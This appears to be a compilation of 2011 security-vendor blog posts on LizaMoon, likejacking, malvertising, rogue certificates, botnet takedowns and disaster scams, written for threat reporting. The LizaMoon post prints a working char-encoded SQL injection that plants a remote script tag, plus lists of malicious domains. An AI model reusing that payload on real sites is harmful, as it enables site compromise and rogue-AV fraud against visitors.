The LizaMoon mass-injection campaign is still ongoing and more than 500,000 pages have a script link to lizamoon.com according to preliminary Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a search on Google returns more than 1,500,000 results that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL or page, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down over time.

Additional injected URLs

Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).

hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php
hxxp://pop-stats.info/ur.php
hxxp://star-stats.info/ur.php
hxxp://multi-stats.info/ur.php
hxxp://google-stats44.info/ur.php
hxxp://books-loader.info/ur.php
hxxp://google-stats73.info/ur.php
hxxp://google-stats47.info/ur.php
hxxp://google-stats50.info/ur.php

List updated: 4/1/2011 12:16pm PT

The domain stats-master111.info was registered on October 21, 2010 which could mean the first attack happened then but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.

SQL Injection

We were able to find more information about the SQL Injection itself (thanks Peter) and the command is par for the course when it comes to SQL Injections. Here's one example:

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)
+as+varchar(8)))--

More information is available over on Stackoverflow.com.

Injected code

Here is the content of an example ur.php file. The content isn't even obfuscated which is somewhat unusual. All the code does is a redirect to a rogue AV site. We've seen the scripts change over time to redirect to several different rogue AV sites:

What happens to the user?

We wrote in an earlier post that the payload site doesn't work properly, but further testing shows that it does and we created a video showing what happens if a user visits a website that contains the injected code. The video is available at the end of this post. The user only gets the malicious code once per IP address, so if you've already visited the site you won't get the code again. This is something we see often in attacks, especially in exploit kits.

The Rogue AV software that is installed is called Windows Stability Center and the file that is downloaded is currently detected by 13/43 anti-virus engines according to VirusTotal.

The software then displays a warning that there are lots of problems on your PC. To fix them you have to pay for the full version of the application. Very traditional rogue AV scam. Dancho Danchev has some more information on his blog.

Where are users coming from?

We looked at reports of traffic to lizamoon.com as indicated by data collected by the Websense Threatseeker Network and here's a graph of where those users are located.

So what about iTunes?

We received blog comments from our readers (keep them coming, we read them all!) and some were critical of our use of iTunes in the title of the previous post and how we stated that iTunes URLs had been compromised, but the script neutered by Apple. All of what we stated was technically correct, but perhaps we didn't make it clear enough.

Every time there's a mass-injection like this, and there really hasn't been anything this big before, we try to identify larger systems and sites that have been affected to give some indication of how wide the attack has spread. And there are few systems out there bigger than iTunes, so when we saw that content on itunes.apple.com contained the injected link we wanted to make people aware of that, even if the script didn't work. It seems that some readers weren't too happy about that and argued that we could also say that Google Search was compromised because it also shows the injected code in search results. We don't really agree with that, but perhaps we shouldn't have highlighted it the way we did.

Questions & Answers about the LizaMoon mass-injection

Q: Why is this called LizaMoon?
A: One of the first domains we saw involved in this campaign was created on March 25, 2011 was called lizamoon.com.

Q: How many pages have been affected by this?
A: With the complications of search algorithms and how they count results it's hard to say. Google Search returns more than 1.5 million results. A Bing Search returns about 900,000 results but the same reservation about their algorithm and how they count results applies. We believe the number of sites infected are significantly smaller.

Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.

Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. Initially we only received reports of users running Microsoft SQL Server 2000 and 2005 being hit but since then we have also received reports of websites using Microsoft SQL Server 2008 being injected as well.

Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2000 and 2005?
A: No. Everything points to that this is a vulnerability in a web application. We don't know which one(s) yet but SQL Injection attacks work by issuing SQL commands in unsanitized input to the server. That doesn't mean it's a vulnerability in the SQL Server itself, it means that the web application isn't filtering input from the user correctly.

Q: What happens when I visit a site that contains the injected script?
A: Your PC will get redirected to a rogue AV site, displaying fake information about your PC being infected.

Q: Will I get redirected over and over again if I visit a compromised site?
A: No, the script only redirects you once.

Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.

Video

Below is a video showing what happens when a user visits a site that has the LizaMoon script injected.

Websense Security Labs and the Websense Threatseeker Network have identified a new malicious mass-injection campaign that we call LizaMoon. Websense customers are protected with the Advanced Classification Engine.

Updated information

We have updated information about the LizaMoon injection available here:

http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx

LizaMoon

The LizaMoon mass-injection is a SQL injection attack that inserts the following line into the code of the page:

<script src=hxxp://lizamoon.com/ur.php></script>

According to a Google Search, over 28,000 226,000 URLs have been compromised. This includes several iTunes URLs, as you can see below:

And here is the injected code at one of those iTunes URLs:

The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer. So good job, Apple.

The URL that is injected is unavailable right now, but the server is still up and running, so that could change at any time. While it was up, the script contained simple JavaScript code that redirected the user to a well-known Rogue AV site: hxxp://defender-uqko.in. That site is also unavailable right now, so we don't have the actual binary analysis information available yet.

The domain lizamoon.com was registered three days ago with clearly fake information:

We'll keep monitoring this mass-injection attack and provide updated information as it's available.

UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen.

UPDATE2: We have been monitoring the attack since it came out and noticed that the number of the compromised URLs is still increasing, 380,000 URLs so far, moreover, more domains started to be involved except for lizamoon.com.

The mere mention of anything with a sex connotation on Facebook almost always begets some major activity, with people wanting to know more. As a result, whatever the attack vector or channel might be is propagated, and the attacker is sure to get some response.

In this example a Facebook click-jacking attack jumped on the bandwagon of Italian model Marika Fruscio's unfortunate incident with a wardrobe malfunction on live TV.  The title of the scam on Facebook was "The beautiful Marika Fruscio shows her breasts on Italian TV!", which almost sounds like it was staged as opposed to an accident.  Whatever the theory, the interesting part of this attack is what happens when someone clicks on the provided link to watch the embedded video.

The example seems harmless as upon clicking the link, the user is directed to another page where they can view the video.  While this is happening, the user's account is being exploited to post the video on their homepage to distribute.  The user is also added to the list of those who like the video, consequently encouraging others to view this.  The series of steps involved is shown below.

An infected account shows the advert as being liked either by a friend or contact within your Facebook account:

The user is then directed to the page below to view the video.  Unknown to the user, there are hidden elements and iframes within the HTML code, located at the Play button, which directly access the user's 'like' option within Facebook .  These hidden elements are where the magic of click-jacking, or shall we say like-jacking, happens.

Innocent-looking page as seen by the user:

Riddled page with hidden elements and iframe superimposed on the Play button and various parts of the page:

On clicking the Play button, two events take place. The first is that the user's Facebook account accepts 'liking' the video, with the video being posted on their wall as a result. The second is that the video plays Marika Fruscio's wardrobe malfunction on live TV. 

Below is the screen the user is presented with if they are not already logged in to Facebook:

The compromised account then displays a video link on the user's wall encouraging others to view this. 

There are several reasons for this type of attack and in this instance although there is nothing apparently malicious, it brings to mind the elaborate ploy where an attacker uses this means to earn some money.  Pay-per-click springs to mind, as attackers for these scams usually get the user to click on hidden links in order to get many hits, which then rewards the attacker with money.

Further analysis using our in-house tools on spontour.net shows the various links and how they are interconnected.

To protect yourself from attacks such as these, and also from posts like this being posted on your wall, try our free Defensio Facebook app.

Today it was reported that Spotify, the popular streaming music service, displayed malicious ads to users of their Free version. The ads lead to websites that used the Blackhole Exploit Kit to infect users with the Windows Recovery fake AV application. Our Advanced Classification Engine has full coverage for the Blackhole kit and protected users proactively. The first report we have of a malicious ad being displayed is from around 11:30 GMT on March 24.

Malvertising is nothing new, we've seen it effect large websites in the past but this case is slightly different. In the past the malicious ads have been displayed as part of a website and viewed with the browser. In this case the malicious ad is actually displayed inside of the Spotify application, like in the picture below (note that the ad below is not malicious, it's just an example):

The application will render the ad code and run it as if it were run inside a browser. This means that the Blackhole Exploit Kit works perfectly fine and it's enough that the ad is just displayed to you in Spotify to get infected, you don't even have to click on the ad itself. So if you had Spotify open but running in the background, listening to your favorite tunes, you could still get infected. Seems like free does come at a price after all. Spotify removed all 3rd party ads in the free version while they did their investigation but the ads have now been turned back on again.

Once the ad was displayed, the computer would connect to hxxp://uev1.co.cc where the exploit kit tries several vulnerabilities to infect the user. The IP address where the malicious content is hosted is well-known to us and we have seen it host the same exploit kit on several other domains:

Again, it was enough for the ad to just be displayed in the Spotify application, the user didn't have to click on the ad or do anything else. One of the vulnerabilities the exploit kit uses is a vulnerability in Adobe Reader/Acrobat. The kit uses a heavily obfuscated PDF file to make the infected computer download the fake AV software. Here are the VirusTotal reports for the PDF and the fake AV file. Once the fake AV is launched it connects to the following domains to download additional content, including a rootkit which is a packed version of TDSS:

• tuartma.in
• rappour.in
• findstiff.org
• searchcruel.org
• findclear.org
• replity.in
• searchgrubby.org
• demivee.in
• ripplig.in

Here's a screenshot of what the application looks like on the user's PC:

One interesting thing is that we have only seen reports from infected users in the UK. This could mean that the attack only targets UK users or it's just that we haven't received reports from users anywhere else. If you are outside of the UK and have been affected by this, please send us a note using the comments feature below.

UPDATE: We got a tweet from our friends at Avast who report this breakdown of users who have seen the malicious ad: Sweden 59%, 40% UK and 1% for other countries. Thanks Avast, appreciate the info!

Thanks to Adam Hiscocks for providing information and samples to us.

SSL certificates are used to validate the identity of a Web site to users. Yesterday Comodo, a certificate vendor, announced that nine SSL certificates had been bought and issued for the following domains:

• mail.google.com (Gmail)
• login.live.com (Hotmail and Microsoft Live services)
• www.google.com
• login.yahoo.com (three different certificates)
• login.skype.com
• addons.mozilla.org (Firefox extensions)
• "Global Trustee"

Comodo added the rogue certificates to their Certificate Revocation List (CRL) in the evening of March 15, 2011 and Microsoft, Mozilla etc have released updates to their browsers since then.

What does this mean?

The rogue SSL certificates could have been used to set up Web sites that provide fake login services for the services listed above (Gmail, Yahoo, Live, Skype etc). By doing that, whoever was behind this could steal user names and passwords even though the traffic was encrypted with SSL and the user wouldn't know anything was wrong. With the updated CRL list the user would get a warning when visiting a site using any of the rogue certificates and would hopefully not enter any credentials.

Comodo states in their report that a user account at one of their affiliate partners was compromised and used to issue the rogue certificates. The attacker used several IP addresses when doing this, but mainly used an IP address from Iran. According to the investigation done by Comodo the attacker was very quick to issue the certificates, knew exactly which domains to issue them for, and didn't waste any time when doing this.

How do Websense products protect users?

Users who have Windows Update enabled will receive the revoked CRL automatically for Internet Explorer, and if you have automatic updates enabled for any other browser it will download the the CRL as well. Our products also have the ability to check the validity of a SSL certificate and the benefit of doing that is that the product will do it for all users, regardless of which browser they use and if they have the update or not. This feature is not enabled by default  in Websense Content Gateway, so follow the steps below to enable the CRL verification.

If unsure we recommend that you contact your Technical Account Manager to discuss how this change will affect the user experience in your particular environment.

1. Log on to Content Gateway Manager.
   
   
   
2. Go to Configure > My Proxy > Basic > Features > HTTPS, and enable HTTPS Protocol.
3. Go to Configure > My Proxy > Basic > Restart and select Restart to enable the SSL Inspection (SSL Manager).
4. Go to Configure > My Proxy > SSL > Validation > General and configure the page as follows:
   
   • Select Enable the certificate verification engine
   • Clear Deny certificates where the common name does not match the URL (see below)
   • Verify that Check certificate revocation by CRL is selected
   • Click Apply
   
   
   
   
5. Optional step: Select the Verification Bypass tab and make sure the following options are selected.
   Important note: This is an optional step that depends on your organization's security policy. If you choose this option, users will have the ability to continue browsing to dangerous Web sites with potential rogue SSL certificates, so if you don't wish to give users this choice, skip this step.
   
   
   
   This will prompt the user with a warning message informing them that the certificate is invalid, but they will have the option to click Continue to visit the page.
6. Select the Revocation Settings tab and make sure that the automatic download of new CRL lists is enabled:
   
   

If the automatic download was disabled, we recommend that you force an update to make sure the latest CRL lists are downloaded. If the download was already enabled, you don't have to do this as the updated CRL list from Comodo was released on March 15 and your Websense product will already have the list installed. Regardless if you have the CRL verification turned on or not, the Advanced Classification Engine will scan the content from any site, including those using the rogue SSL certificates, as long as you have SSL inspection turned on, and block all malicious code.

RIP Rustock botnet!  Today marks exactly one week since Rustock, one of the largest spam generator botnets, was taken down by the Microsoft digital crime unit and US federal law enforcement agents.

Rustock had more than 250,000 bots approximately, and until last Wednesday was one of the biggest known bot networks.  The bot's author was implementing certain stealth techniques to hide his invention as deep as possible in victims' Windows systems and to make it undetectable by various AV engines.  One of the techniques used was to not send spam emails for a certain amount of time after infection took place.

Rustock was not the first botnet to be taken down.  The same fate befell ex-botnets like Srizbi in 2008, and Waledac in 2010.  In this particular case, several third parties were involved and worked with Microsoft to take down this botnet, as it was affecting their businesses.  Typical Rustock spam emails advertised fake pharmaceuticals products.

The graph below shows a significant/steep drop in connections to one of the Websense servers on Wednesday 16th and in the following days, coinciding with Microsoft's annihilation of the botnet a week ago.

At the same time Microsoft applied proactive measures to prevent the reregistration of domains for C&C.  The corporation is working in cooperation with CN-CERT to block the registration of domains in China which they think could be generated by Rustock.

As seen from history, it is not the first and won't be the last botnet to be taken down.  Websense Security Labs continues to monitor the global spam situation and to provide the best protection for our customers.

Websense® Security Labs™ Threatseeker® network has detected a new malicious email campaign that masquerades as originating from Facebook. The campaign appears to actually be originating from the Cutwail/Pushdo spam bot. This time round, the Cyber criminals employ two attack vectors: social engineering and an exploit kit. Both end up with the Zeus/Zbot Trojan installed on the targeted machines.  

Websense customers are protected from this attack with our Advanced Classification Engine analytics, our suite of technologies within TRITON.

Here is an example of a malicious email in Spanish:

The malicious email is spoofed to appear to be coming from Facebook.com and says: "Hi, someone loves your photo comments, please click on the link to see all comments". It provides a fake URL disguised as a formal Facebook link. Once clicked, the user is redirected to an attack page and is prompted to download and run an "update" from Facebook. The "update" file is a Zeus/Zbot Trojan variant. At the time of writing, the file had only a 7% detection.

The attack isn't over yet. While the fake Facebook page loads, the user's machine is attacked silently with several exploits in the background. The exploits are sent via an iframe contained in the fake Facebook attack page. This process happens silently when the attack page is loaded. The exploits are loaded from one of the most prevalent exploit kits today - the Blackhole exploit kit. Any successful exploitation results in the Zeus/Zbot Trojan installed silently on the user's machine.

Here is an example iframe from the Facebook attack page that points to Blackhole exploit kit:

Websense® Security Labs™ has received reports of a new zero-day exploit that targets Adobe Flash Player (CVE-2011-0609). The vulnerability can potentially allow an attacker to execute malicious code on a targeted machine and has been spotted in a limited number of targeted attacks. The targeted attacks employed an Excel file with an embedded vulnerable Flash file (.swf) with the aim of executing unsolicited malicious code on the targeted machines.

The security advisory released by Adobe marks the vulnerability as "critical" and it affects all the latest versions of Adobe Flash Player. The vulnerability also exists in Adobe Acrobat Reader and Adobe Acrobat Reader X as the vulnerable DLL file "authplay.dll" is also shipped with those versions. However, Adobe Acrobat X can mitigate this kind of vulnerability from executing, thanks to its sandbox functionality - so in that respect, it's highly recommended to upgrade to that version if possible.

Adobe plans to patch this vulnerability with an update to Flash Player that will be available for all platforms on the 21st of March.

Currently, we're not seeing any wide-spread attacks in the wild that utilize this vulnerability, much of that is because the exploit details aren't publicly disclosed, but we're monitoring the situation and will keep you updated as related events unfold.

It’s no secret that criminals try to use huge disasters to their benefit to make some cash,  this time is no exception!  We have been able to track several black hat methods to convince people to "help” Japan’s disaster-affected population.  The set of techniques are not new and usually involve:

• SEO poisoning
• Rogue AV (anti-virus)
• Phishing emails asking for donation
• Malicious files attached to emails claiming to be legitimate documents
• Facebook apps with CPA (cost per action) lead surveys

Websense customers are protected from such attacks with our Advanced Classification Engine analytics, our suite of technologies within TRITON.

Black Hat SEO

SEO poisoning was used within minutes after the first wave hit the Japanese coast.  Using common search terms like, "japan earthquake news 2011" to search for the latest information in search engines is bringing all sorts of results, including malicious sites hosting fake AV.

Looks like a benign search result:

Following a link, the victim lands at a website with a slightly modified version of a redirection to fake AV,  in previous campaigns such websites were directly hosting fake AV,  nowadays they redirect to fake AV.

Rogue AV

When redirected via a "CLICK HERE" button,  a warning appears stating that your computer might already be infected:

Whether the "Cancel" or "OK" button is clicked, rogue Windows OS-like anti-virus will popup,  though it is running on a Linux OS

Phishing Email

Below is a very simple, nicely written and almost legitimate email which asks the recipient for a donation on behalf of Humanitarian Care Japan.  Notice this little detail:  "reply to:"  is a free mail address and completely different from the sender's address.

Malicious Email

Another type of e-mails used are malicious e-mails and e-mails with links leading to malicious content. One like this is used in a targeted attack,  providing information about the nuclear crisis in Japan, and also has a document attached called "Understanding Japan's Nuclear Crisis.doc" which surprisingly enough has very low coverage 5/43 in VT. Also, as you can see from the message source, it was also sent from a free mail account.

Facebook apps with CPA lead survey

And the last, but not least, vector of attacks is through social networks.  For example, Websense Threatseeker Network has identified a set of Websites that entice users to watch a video about the latest disaster events in Japan. As you can see per the picture below the involved sites are registered with .info TLD. D1 - stands for "Registered for 1 day". Instead of getting a movie, users are redirected to a Facebook application installation page. The application asks for permission to post on the user's wall.

The scam application has different names such as "RemoteViews",  "Collect",  "Consumer" and others.  Once clicked it asks the victim to fill in a survey to unlock pictures of people who viewed the victim's profile:

It also leaves a post on the victim's wall with a link to this application:

We have already discussed CPA (cost per action) leads in our previous blog about Viral Facebook Applications as well as most techniques listed in this blog.  

In conclusion we can see how, again and again, such disastrous events give cybercriminals a lot of  "ammo" for their "arsenal" of malicious activities.

Month of February

Major Hits

Two major compromises affected the UK in February. Web sites for BBC - 6 Music and BBC Radio - 1xtra were compromised and were serving a malicious iFrame to the Phoenix exploit kit. In addition, AutoTrader, eBay, the London Stock Exchange, Myvue, and many other high-profile locations were hosting ads from an ad provider called Unanimis. This Malvertising campaign occurred over a weekend, and thus did not affect as many people as it might have during work days. The advertisement had an iFrame to another exploit kit that used attachs similar to the Black Hole exploit kit.

Night Dragon attacks were also active.  Night Dragon targets U.S. oil, gas, and petrochemical companies. It steals proprietary and confidential information from executives, by using a combination of social engineering, Remote Administration Tools (RATs), and SQL injection attacks to gain access to external and internal hosts inside companies. It is believed that the attackers are based in China, which may be why the class of attacks is called Night Dragon.

A leaderless and anarchical Internet group, Anonymous, declared war against HBGary Federal when their head of security services said he had uncovered and planned to release the identities of Anonymous’ leaders using social networking sites. Anonymous broke into HBGary Federal’s systems and released their internal confidential information. Whoops.

Several thousands of small businesses and personal sites felt victim to an error of the U.S. Department of Homeland Security and Department of Justice. These Departments announced the seizure of several domains that were involved in the distribution of child pornography. In addition to closing those domains, they managed to shut down a popular shared domain that belongs to a free DNS provider - which resulted in disconnecting of other 84,000 web sites - subdomains of mooo.com. After the incident, several thousand site owners were able to witness a banner with a message stating that advertisement and distribution of child pornography is illegal. 

Researchers discovered a way of accessing passwords stored on iPhone and iPad. The method involves physical access to the device and takes no more than 6 minutes - enough time to carry out this procedure on stolen or unattended devices.

Gambling addiction did not benefit the Hacker who has admitted stealing $12m worth of gaming chips. The hacker has transfered 400 billion gaming chips into his fake Facebook account after gaining unauthorized access into servers of a game developer Zynga, by posing as one of the site administrators.  Ashley Mitchell was trying to sell his illegal gain for about £180,000.

A major incident happened with Australian cosmetics retailer Lush - hackers managed to access and steal the company's entire customers database along with customers' credit card details. The company had not been aware of the vulnerablility, caused by not keeping the Web site updated, and could not identify for how long this security breach had been happening. 

Two major online dating sites, PlentyOfFish.com and eHarmony, got hacked, and the personal and password information of their users were believed to be exposed. Ethical and legal questions were raised regarding the companys' compensation toward such third-party security alerts.

A high-profile victim of malware attacks this month was Nasdaq. According to Nasdaq, there was no evidence that customer information had been exposed by breach. Investigations continue to assess whether the earlier anomalies in the stock market last summer were caused by stock exchange subversion activities.

Web 2 dot uh oh

A couple of Facebook security holes were discovered in February. First was an authentication flaw that allows a malicious Web site to disguise itself as other legitimate sites. This happens only when a malicious Web site is visited while the user is logged into Facebook. Second is yet another saga of clickjacking attacks, this time targetting Italian, Japanese, and Cyrillic audiences. Promises of interesting and perhaps controversial videos led Facebook users into clicking the "Like" button.

It's always interesting to see who viewed your Facebook profile. This statement is proven true as this scam is used over and over again to seduce users into adding shady applications that promise to do this, but instead lead to survey scams. You don't even have to be a developer to carry out these survey scams, because these are usually built using a pre-defined toolkit for only $25 or even less.

Something you know and something you have are the secret ingredients to Google's 2-factor authentication process, which hopes that any attempt to break into Google accounts would be next to impossible. This should serve well those users with weak passwords, because a required one-time password will be sent via text message or voice call whenever a user enters his or her password. This feature will be available to all of Google's free online services. 

Data war between Facebook and Google is the headline towards the end of February. Updates of Google's Nexus S Android phone will no longer appear as if Facebook contacts are integrated with its Android Contacts app. Until Facebook introduces an API similar to Gmail, this standoff has yet to be concluded. 

Browser and friends

Adobe delivered a group of patches in the early part of February. Although not the top threat source, PDF exploit is still a favorite of cyber criminals. In the security update for Adobe Reader and Acrobat, 29 vulnerabilities have been fixed, 23 of which could cause the application to crash and potentially allow an attacker to take control of the affected system. Meanwhile, 13 vulnerabilities have been patched for Adobe Flash Player and 21 vulnerabilities have been patched for Adobe Shockwave Player.

As the most targeted application by exploit, Java has a security update this month. Oracle patched 21 Java security holes; 19 of these vulnerabilities may be remotely exploitable.

Google has updated Chrome to 9.0.597.107 with 19 vulnerabilities fixed.

Also drawing attention is that Pwn2Own 2011 will be held in March in Vancouver. The conference will reward the hacker who successfully hacks IE, Safari, Firefox, or Chrome on a 64-bit system running the latest version of either OS X or Windows 7. Chrome was the only one that survivedast year; who will be the survivor this year?

Microsoft

On Patch Tuesday In February, Microsoft released twelve secruity bulletins. Three of them have a maximum severity rating of Critical. The first one MS11-003 resolves four vulnerabilities in Internet Explorer that could allow remote code execution when a user visits the specially crafted Web page. The second one MS11-006 is a patch for a newly released vulnerability (CVE-2010-3970) last month in Windows Shell Graphics Processing.  The last critical update MS11-007 resolved a privately reported vulnerability in the Windows OpenType Compact Font Format (CFF) driver. The other nine bulletins are rated “important”. The whole patch can be applied to the Microsoft Windows operating system, the Internet Explorer browser, the Microsoft Office productivity suite, Visual Studio, and IIS. However, the recently disclosed cross-site scripting vulnerability in MHTML was still not fixed in February.

In addition to the twelve security updates, Microsoft also released an important but non-security advisory (967940) related to Windows Autorun. The update provided a live package to restrict AutoPlay functionality to only CD and DVD media, in order to help protect customers from attacks involving the execution of arbitrary code by Autorun when a USB flash drive is inserted, with network shares, and with other non-CD media containing a file system with an Autorun.inf file.

In the middle of February a new vulnerability was discovered exploiting an SMB component of Windows. MS SRD quickly posted a blog on this vulnerablity stating that remote exploited code execution is unavailable.

At the end of February, Microsoft published a security advisory (24918888) to remind customers to be aware of an update to the Microsoft Malware Protection Engine. This is a privately reported vulnerability that could allow elevation of privileges if the Microsoft Malware Protection Engine scans a system just after an attacker who has valid login credentials and is using a specially crafted registry key. However, the vulnerability could not be exploited by anonymous users.

Hello ThreatSeeker. You've got mail!

A recap of the past month kicks off with a noticeable increase in spam, as well as spammers going green, having recycled templates or made modifications to slightly older campaigns, in order to present these with a more current theme or touch, offering a convincing effect to all who read them.

This was followed with the repeat offender the Magic blue pill with its mystical attributes, just in time for the Valentines Day rush. This again was aligned almost perfectly with the season to stock up for couples planning romantic getaways. Spammers prove time and time again that they are very much in touch with hot trends and what is current. 

Last, but by no means least, we have the use of social engineering techniques to lure the unsuspecting user into clicking on a provided link within an email. The email message titled "The refreshed site of our company", was not seen in high volumes but was quite an interesting find all the same, because there were common characteristics with malicious style compromises crossing over into the spam domain. This then begs the question: could there be a direct correlation between the two?

Security Trends

Tippingpoint released 22 not patched vulnerabilities from different vendors. Tippingpoint is the operator of the "Zero Day Initiative" bug bounty program. They announced that they would release details 180 days after they become aware of a bug, even if the vendor has not yet released a patch.

Spam image pages have been swapped for scam alerts on imageshack.us. Imageshack said they were able to find over 300 scam images uploaded to their services and were able to replace them with an alert image within an hour of their being reported.

Suspicious companies were started to pay writers money to embed spyware into mobile applications. Mobile users typically have less control of their devices than PC users; therefore more care should be taken when you install applications onto mobile devices.

Visa has relaxed its regulatory rules so that European high street merchants who capture at least three-quarters of their take through EMV-enabled chip-and-PIN terminals will no longer have to pass Payment Card Industry Data Security Standard (PCI DSS) audits every year.

This month's roundup contributors:
Artem Gololobov
Ping Yan
Grace Timcang
Ulysses Wang
Xue Yang
Amon Sanniez
Lei Li